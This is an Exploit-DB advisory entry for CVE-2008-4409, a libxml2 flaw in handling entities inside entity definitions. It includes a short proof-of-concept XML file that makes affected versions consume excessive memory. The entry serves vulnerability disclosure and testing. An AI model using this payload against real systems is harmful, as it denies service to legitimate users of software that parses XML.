libxml2 - Denial of Service Vulnerability

ID EDB-ID:32454
Type exploitdb
Reporter Christian Weiske
Modified 2008-10-02T00:00:00


libxml2 Denial of Service Vulnerability. CVE-2008-4409. Dos exploit for unix platform


The libxml2 library is prone to a denial-of-service vulnerability caused by an error when handling files using entities in entity definitions.

An attacker can exploit this issue to cause the library to consume an excessive amount of memory, denying service to legitimate users.

The issue affects libxml2 2.7 prior to 2.7.2. 

XML file:

<?xml version='1.0' ?>
<!DOCTYPE test [
<!ENTITY ampproblem '&'>
<t a="&ampproblem;">a</t>